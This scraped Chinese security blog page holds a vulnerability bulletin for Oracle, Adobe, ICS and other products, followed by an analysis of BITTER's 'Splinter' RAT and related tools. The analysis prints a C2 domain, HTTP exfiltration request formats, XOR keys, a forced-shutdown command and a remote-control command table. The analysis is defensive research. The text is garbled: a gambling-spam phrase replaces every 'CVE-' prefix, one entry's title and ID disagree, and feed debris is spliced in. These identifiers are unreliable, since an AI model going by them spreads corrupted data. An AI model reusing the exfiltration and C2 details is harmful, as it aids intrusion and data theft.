    • cve编号:2018年送彩金网站大全2019-2938
  • Oracle MySQL Server产品安全漏洞(2018年送彩金网站大全2019-3009)
    • 危险等级:低
    • cve编号:2018年送彩金网站大全2019-3009
  • Oracle MySQL Server产品安全漏洞(2018年送彩金网站大全2019-3018)
    • 危险等级:低
    • cve编号:2018年送彩金网站大全2019-3018
  • Oracle MySQL Server产品安全漏洞(2018年送彩金网站大全2019-2957)
    • 危险等级:低
    • cve编号:2018年送彩金网站大全2019-2957
  • Oracle MySQL Server产品安全漏洞(2018年送彩金网站大全2019-2998)
    • 危险等级:低
    • cve编号:2018年送彩金网站大全2019-2998
  • Oracle MySQL Server产品安全漏洞(2018年送彩金网站大全2019-2960)
    • 危险等级:低
    • cve编号:2018年送彩金网站大全2019-2960
  • Oracle MySQL Server产品安全漏洞(2018年送彩金网站大全2019-2982)
    • 危险等级:低
    • cve编号:2018年送彩金网站大全2019-2982
  • Oracle MySQL Server产品安全漏洞(2018年送彩金网站大全2019-2948)
    • 危险等级:低
    • cve编号:2018年送彩金网站大全2019-2948
  • Oracle MySQL Server产品安全漏洞(2018年送彩金网站大全2019-2950)
    • 危险等级:低
    • cve编号:2018年送彩金网站大全2019-2950
  • Oracle MySQL Server产品安全漏洞(2018年送彩金网站大全2019-2968)
    • 危险等级:低
    • cve编号:2018年送彩金网站大全2019-2968
  • Oracle MySQL Server产品安全漏洞(2018年送彩金网站大全2019-3003)
    • 危险等级:低
    • cve编号:2018年送彩金网站大全2019-3003
  • Oracle MySQL Server产品安全漏洞(2018年送彩金网站大全2019-2997)
    • 危险等级:低
    • cve编号:2018年送彩金网站大全2019-2997
  • Oracle MySQL Server产品安全漏洞(2018年送彩金网站大全2019-2963)
    • 危险等级:低
    • cve编号:2018年送彩金网站大全2019-2963
  • Oracle MySQL Server产品安全漏洞(2018年送彩金网站大全2019-2924)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-2924
  • Oracle MySQL Workbench产品安全漏洞(2018年送彩金网站大全2019-1549)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-1549
  • Oracle MySQL Server产品安全漏洞(2018年送彩金网站大全2019-2923)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-2923
  • Oracle MySQL Server产品安全漏洞(2018年送彩金网站大全2019-2922)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-2922
  • Oracle MySQL Connectors产品安全漏洞(2018年送彩金网站大全2019-2920)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-2920
  • Oracle MySQL Server产品安全漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-2993
  • Oracle MySQL Server产品安全漏洞(2018年送彩金网站大全2019-2991)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-2991
  • Oracle MySQL Server产品安全漏洞(2018年送彩金网站大全2019-2969)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-2969
  • Oracle MySQL Server产品安全漏洞(2018年送彩金网站大全2019-2914)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-2914
  • Oracle MySQL Server产品安全漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-2974
  • Oracle MySQL Server产品安全漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-2946
  • Oracle MySQL Server产品安全漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-3004
  • Oracle MySQL Server产品安全漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-2966
  • Oracle MySQL Server产品安全漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-2967
  • Oracle MySQL Server产品安全漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-3011
  • Oracle MySQL Connectors产品安全漏洞
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-1543
  • Oracle MySQL Enterprise Monitor产品安全漏洞
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-10072
  • Oracle MySQL Workbench产品安全漏洞
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-8457
  • Oracle MySQL Server产品安全漏洞
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-5443
  • Oracle Java SE/Java SE Embedded 组件安全漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-2945
  • Oracle Java SE/Java SE Embedded 组件安全漏洞
    • 危险等级:低
    • cve编号:2018年送彩金网站大全2019-2933
  • Oracle Java SE/Java SE Embedded 组件安全漏洞
    • 危险等级:低
    • cve编号:2018年送彩金网站大全2019-2983
  • Oracle Java SE/Java SE Embedded 组件安全漏洞
    • 危险等级:低
    • cve编号:2018年送彩金网站大全2019-2894
  • Oracle Java SE/Java SE Embedded 组件安全漏洞
    • 危险等级:低
    • cve编号:2018年送彩金网站大全2019-2978
  • Oracle Java SE/Java SE Embedded 组件安全漏洞(2018年送彩金网站大全2019-2981)
    • 危险等级:低
    • cve编号:2018年送彩金网站大全2019-2981
  • Schneider Electric Proclima代码注入漏洞
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-6823
  • Schneider Electric Proclima缓冲区溢出任意代码执行漏洞
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-6824
  • Schneider Electric Proclima搜索路径元素任意代码执行漏洞
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-6825
  • AVEVA Vijeo Citect和Citect栈缓冲区溢出漏洞
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-13537
  • Horner Automation Cscape任意代码执行漏洞(2018年送彩金网站大全2019-13541)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-13541
  • Horner Automation Cscape缓冲区溢出任意代码执行漏洞(2018年送彩金网站大全2019-13545)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-13545
  • FusionPBX 跨站脚本漏洞(2018年送彩金网站大全2019-16974)
    • 危险等级:低
    • cve编号:2018年送彩金网站大全2019-16974
  • FusionPBX 跨站脚本漏洞(2018年送彩金网站大全2019-16979)
    • 危险等级:低
    • cve编号:2018年送彩金网站大全2019-16979
  • FusionPBX 跨站脚本漏洞(2018年送彩金网站大全2019-16969)
    • 危险等级:低
    • cve编号:2018年送彩金网站大全2019-16969
  • Mozilla Firefox CSP绕过安全漏洞(2018年送彩金网站大全2019-17001)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-17001
  • Apache Traffic Server 安全漏洞(2018年送彩金网站大全2019-10079)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-10079
  • php-fpm远程代码执行漏洞(2018年送彩金网站大全2019-11043)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-10043
  • Linux kernel rtl_p2p_noa_ie缓冲区溢出漏洞(2018年送彩金网站大全2019-17666)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-17666
  • Adobe Acrobat和Reader 越界写任意代码执行漏洞(2018年送彩金网站大全2019-7822)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7822
  • Adobe Acrobat和Reader 类型混淆任意代码执行漏洞(2018年送彩金网站大全2019-7820)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7820
  • Adobe Acrobat和Reader 越界写任意代码执行漏洞(2018年送彩金网站大全2019-7818)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7818
  • Adobe Acrobat和Reader 越界写任意代码执行漏洞(2018年送彩金网站大全2019-7967)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7967
  • Adobe Acrobat和Reader 越界写任意代码执行漏洞(2018年送彩金网站大全2019-7804)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7804
  • Adobe Acrobat和Reader 越界写任意代码执行漏洞(2018年送彩金网站大全2019-7800)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7800
  • Adobe Acrobat和Reader 路径遍历信息泄露漏洞(2018年送彩金网站大全2019-8238)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-8238
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7841)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7841
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7836)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7836
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7813)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7813
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7826)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7826
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7812)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7812
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7811)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7811
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7810)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7810
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7803)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7803
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7801)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7801
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7802)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7802
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7798)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7798
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7799)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7799
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7795)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7795
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7790)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7790
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7793)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7793
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7794)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7794
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7789)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7789
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7780)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7780
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7787)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7787
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7778)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7778
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7775)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7775
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7776)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7776
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7777)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7777
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7773)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7773
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7774)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7774
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7770)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7770
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7771)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7771
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7758)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7758
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7769)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7769
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7145)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7145
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7143)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7143
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7144)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7144
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7142)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7142
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7143)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7143
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7141)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7141
  • Adobe Acrobat和Reader 越界写任意代码执行漏洞(2018年送彩金网站大全2019-7825)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7825
  • Adobe Acrobat和Reader 越界写任意代码执行漏洞(2018年送彩金网站大全2019-7829)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7829
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7966)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7966
  • Adobe Acrobat和Reader 越界读取信息泄露漏洞(2018年送彩金网站大全2019-7140)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-7140
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7835)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7835
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7833)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7833
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7834)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7834
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7832)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7832
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7830)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7830
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7831)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7831
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7817)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7817
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7821)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7821
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7823)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7823
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7814)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7814
  • Adobe Acrobat和Reader 安全限制绕过任意代码执行漏洞(2018年送彩金网站大全2019-7779)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7779
  • Adobe Acrobat和Reader 双重释放任意代码执行漏洞(2018年送彩金网站大全2019-7784)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7784
  • Adobe Acrobat和Reader 缓冲区溢出任意代码执行漏洞(2018年送彩金网站大全2019-7824)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7824
  • Adobe Acrobat和Reader 堆溢出任意代码执行漏洞(2018年送彩金网站大全2019-7827)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7827
  • Adobe Acrobat和Reader 堆溢出任意代码执行漏洞(2018年送彩金网站大全2019-7828)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7828
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7759)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7759
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7764)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7764
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7763)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7763
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7762)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7762
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7761)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7761
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7760)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7760
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7765)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7765
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7766)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7766
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7767)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7767
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7768)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7768
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7772)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7772
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7781)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7781
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7782)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7782
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7783)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7783
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7785)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7785
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7786)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7786
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7788)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7788
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7791)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7791
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7792)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7792
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7796)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7796
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7797)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7797
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7805)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7805
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7806)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7806
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7809)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7809
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7808)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7808
  • Adobe Acrobat和Reader 释放后重利用任意代码执行漏洞(2018年送彩金网站大全2019-7807)
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-7807
  • Oracle PeopleSoft Enterprise PeopleTools产品安全漏洞(2018年送彩金网站大全2019-3015)
    • 危险等级:低
    • cve编号:2018年送彩金网站大全2019-3015
  • Oracle PeopleSoft Enterprise PeopleTools产品安全漏洞(2018年送彩金网站大全2019-3023)
    • 危险等级:低
    • cve编号:2018年送彩金网站大全2019-3023
  • Oracle PeopleSoft Enterprise PeopleTools产品安全漏洞
    • 危险等级:高
    • cve编号:2018年送彩金网站大全2019-2932
  • Oracle PeopleSoft Enterprise PeopleTools产品安全漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-2915
  • Oracle PeopleSoft Enterprise PeopleTools产品安全漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-2985
  • Oracle PeopleSoft Enterprise PeopleTools产品安全漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-3014
  • Oracle PeopleSoft Enterprise PeopleTools产品安全漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-2929
  • Oracle PeopleSoft Enterprise PeopleTools产品安全漏洞
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-2931
  • Oracle PeopleSoft Enterprise PeopleTools产品安全漏洞(2018年送彩金网站大全2019-11358)
    • 危险等级:中
    • cve编号:2018年送彩金网站大全2019-11358

(数据来源:绿盟威胁情报中心)

文章来源:绿盟科技博客
]]>
http://blog.cholochitro.com/nsfocus-2019-43/feed/ 0
Splinter新APT攻击工具透析 http://blog.cholochitro.com/splinters-new-apt-attack-tool-dialysis/ http://blog.nsfocus.net/splinters-new-apt-attack-tool-dialysis/#respond Mon, 28 Oct 2019 10:45:23 +0000 http://blog.cholochitro.com/?p=16048        近期,绿盟科技伏影实验室威胁追踪系统监测到一个新APT攻击事件。此次事件起源于我们截获的一封邮件所含附件,该邮件命名为“指示细节”,内附文档《指示细节.doc》,该文档使用2018年送彩金网站大全2018-0802漏洞进行攻击。

一、概述

       近期,绿盟科技伏影实验室威胁追踪系统监测到一个新APT攻击事件。此次事件起源于我们截获的一封邮件所含附件,该邮件命名为“指示细节”,内附文档《指示细节.doc》,该文档使用2018年送彩金网站大全2018-0802漏洞进行攻击。经过持续的跟踪与监控,我们最终捕获到该事件背后组织存放恶意文件的托管服务器地址,并获取到了攻击武器库中所有的文件。在与历史数据进行对比后,我们发现该组织近期更新了多个攻击工具,且对部分工具进行了功能细分。此次获取的工具包括:下载器,键盘记录器,上传agent工具,独立的命令模块以及远控工具。在其中我们发现了一个从未在该组织基础设施中发现过的RAT工具。该工具尚处于开发状态,其功能日趋复杂,我们对其进行持续的发掘和追踪,并将其命名为Splinter。

二、活动分析

     1、攻击方式

       此次攻击仍然使用钓鱼Doc文档作为攻击投递手段,利用了2018年送彩金网站大全2018-0802的漏洞进行攻击,运行后下载可执行文件,并执行。

     2、Splinter功能分析

       我们在攻击者服务器上找到了一个全新的攻击工具,我们将其命名为Splinter。Splinter使用.NET语言开发。接下来我们对其进行详细分析。

图 PE信息截图

首先通过工具可以看到该样本在2019-08-28编译,并且存在pdb路径,可见此攻击工具是该组织当前最新制作工具,极可能在未来投放使用。

图 RAT信息

Splinter在网络通信过程中使用加密算法进行特征隐藏,规避检测。其在与C2的交互上内置了两种不同的加密方式,第一种为BITTER常使用的xor算法,密钥1为:0xB65F6,密钥2为:123,密钥3为:0x2,密钥4为:‘LZQR’;第二种为AES-256,但在实际分析过程中,该加密算法并未启用,我们推测,这个加密方式应该处于测试阶段,且当前RAT工具仍处于开发阶段。

Splinter内置了多种远控功能,在初始化函数中,所有功能函数及其说明如下:

图 功能模块信息

对其控制协议进行详细解析,指令及对应功能、特征列举如下:

表:协议结构

而在2019年9月5日 9:23攻击者上传了该新RAT工具的第二个版本,此版本更新了网络连接部分,去除了原本的加密方法,我们推测该组织的开发人员可能在加密解密部分以及通信隐蔽性上遇到了麻烦。

     3、其他攻击工具分析

       此次事件,我们获取到了所有托管在该C2服务器上的恶意文件及活动记录。2019年9月5日,我们监控到该服务器上的文件更新,且在9月5日晚些时候再次更新了服务器上的RAT工具,2019年9月8日该服务器已经关闭,但随后又重新开启。

对此次事件涉及Doc文档,及服务器上所获取攻击工具如下。

 钓鱼Doc文档-投递工具载体

       此次事件投递载体钓鱼Doc文档,其下载的恶意可执行文件使用ROT13变形算法对恶意文件中存在的静态字符串进行加密,将字符串解密后发现了其使用的C2域名,该C2是一个文件服务器,存储了此次攻击所使用的所有攻击工具。同时,受感染机器也会向该地址发送从受感染机器上提取的机器信息。

图 算法截图

该恶意文件会获取主机名、计算机名、操作系统信息、当前机器的用户名及GUID,并将这些信息拼接成固定格式的字符串,利用HTTP的GET方法上传至服务器,格式如下:

       ?a=[主机名]&b=[计算机名]&c=[操作系统信息]&d=[当前机器的用户名及GUID]&e=

       在接收到C2返回的数据中搜索Yes file字段,如果存在该字符串,则搜索[]字符,获取[]中的数据,和url进行拼接,下载后重命名为.exe结尾的文件,并执行。

       audiodq-下载器:

       该文件即为doc下载的恶意文件,该文件负责根据C2下发的任务,下载不同的模块到受感染机器中。

       igfxsrvk-键盘记录器:

       通过设置键盘钩子,获取键盘按键信息,搜集输入的内容,保存在%APPDATA%\syslog0812AXbcW1.tean文件中,该文件名以syslog开头,降低了在人工排查时被快速发现的概率。

图 关键代码截图

       lsap、lsapc、lsapcr – 上传者工具:

       创建log文件:C:\Windows\debug\WIA\winlog0a.txt,记录近期改动的文件名称,获取计算机名称,获取GUID,将以上信息拼接,使用HTTP协议将数据发送出去。

图 lsap核心功能截图

       上传信息格式如下:

POST /autolan.php?l=WIN-HV9TU5VPRAN@8c6a7398-ff99-410c-a6c3-d6acbffd41ce@2019.09.06.133248@C HTTP/1.1

Host: winlocsec.ddns.net

Content-Type: multipart/form-data; boundary=—-aNtPOGQuYdaKesBchd3651PDK986436LSTHSYB23akdKsOPxrsQzvf

Content-Length: 823

Connection: Keep-Alive

——aNtPOGQuYdaKesBchd3651PDK986436LSTHSYB23akdKsOPxrsQzvf

Content-Disposition: form-data; name=”file”; filename=”C:\Windows\debug\WIA\winlog0a.txt”

Content-Type: text/plain

20190906104956_C:\Users\hello\AppData\Roaming\syslog0812AXbcW.neat||20190905155411_C:\Users\hello\Desktop\z

       其中——aNtPOGQuYdaKesBchd3651PDK986436LSTHSYB23akdKsOPxrsQzvf和—-aNtPOGQuYdaKesBchd3651PDK986436LSTHSYB23akdKsOPxrsQzvf是样本中自带信息,未发现解析过程。

       sht、sleep-功能模块

       负责执行命令:c:\\windows\\system32\\shutdown /s /t 0

图 sht模块核心代码截图
图 sleep模块核心代码截图

       根据上传时间,可以认为sleep文件用来替换sht文件,经对比得知两文件无任何差别。

       Kill、regdl-功能模块

       设置自启动项:

图 kill模块中自启动项内容

图 regdl模块中自启动项内容

       winsvc-远控模块

       我们认为此次使用的工具与其V3版本[lw3] [z4] 的远控工具[1]功能完全一致,加密算法也一致,C2交互命令使用密钥为:mar4tysvql4dc,除此之外并无不同,其命令指令功能列举如下:

表:命令控制字含义

ID 释义
3000 当前状态信息
3001 获取磁盘列表
3002 枚举指定目录下文件
3004 重新读取枚举目录的文件列表
3005 创建文件
3006 写入文件
3007 打开文件
3009 读取并上传
3012 创建cmd进程,利用管道进行通信
3013 执行cmd命令
3015 重新读取执行结果
3016 终止cmd进程

三、对比分析

       我们从二进制文件,网络信息以及关联分析的角度,对此次攻击事件中捕获的恶意文件进行分析,发现除Splinter远控工具之外,其他工具均属于BITTER这一APT组织。

1、二进制文件对比

       我们通过hash搜索到了2018年BITTER报告中的Downloader二进制文件,从代码结构上看,两者几乎完全一致。

图 代码对比

Keylogger模块对比:

图 对比图

远控模块对比结果:

图 对比图

我们在分析regdl文件时,发现了相同的pdb路径,且两者除时间不一致外,其他信息完全一致:

图 对比图

以上分析结果与友商在2018年披露的BITTER组织使用的攻击工具、其他厂商在2017年发布的文章中提及到的攻击模块的流程完全一致,因此我们认为该C2服务器及提及到的恶意软件归属于BITTER组织。

2、网络信息对比

图 流量信息截图

上图为downloader产生的流量,可以看到发送的信息格式是完全一致的,且属于V3版本。

我们在最新的RAT工具中解析得到了域名和早已披露的RAT工具中获取的域名mscnsservice.ddns.net的命名上有相通之处,且与上传者恶意文件中附带的信息上传域名类似。

3、关联分析

       利用分析样本获取到的关键特征,我们查找到了名为lsap.exe的文件,对比二进制文件:

图 对比图

核心代码部分基本上完全一致。2019.05版本的C2地址和本次捕获的恶意文件连接的C2地址相同。

